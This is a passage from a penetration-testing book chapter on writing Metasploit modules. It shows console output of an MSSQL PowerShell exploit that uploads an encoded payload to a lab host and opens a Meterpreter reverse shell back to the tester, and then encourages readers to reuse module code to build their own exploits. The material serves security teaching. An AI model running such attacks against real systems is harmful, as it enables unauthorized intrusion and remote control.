196
Chapter 13
RHOST => 172.16.32.136
msf exploit(mssql_powershell) >
exploit
[*] Started reverse handler on 172.16.32.129:4444
[*] Warning: This module will leave CztBAnfG.exe in the SQL Server %TEMP% directory
[*] Uploading the payload CztBAnfG, please be patient...
[*] Converting the payload utilizing PowerShell EncodedCommand...
[*] Executing the payload...
[*] Sending stage (748032 bytes) to 172.16.32.136
[*] Be sure to cleanup CztBAnfG.exe...
[*] Meterpreter session 1 opened (172.16.32.129:4444 -> 172.16.32.136:49164) at 2010-05-17
16:12:19 -0400
meterpreter >
The Power of Code Reuse
This process of leveraging existing code, tweaking it, and adding in some
original code is one of the most powerful things we can do with Metasploit.
You have no reason to start from scratch in most situations after you have a
feel for the Framework and you take a look at how existing code works. Because
this module was essentially built for you, you can get more practice by going
through other Metasploit modules and seeing what they are doing and how
they work. You’ll start to learn the basics of buffer overflows and how they are
created. Notice how the code is structured and how it works, and then create
your own exploits from scratch. If you’re not familiar with the Ruby program-
ming language or if this chapter was a bit over your head, pick up a book and
read and learn. The best way to learn how to create these types of module
development is through trial and error.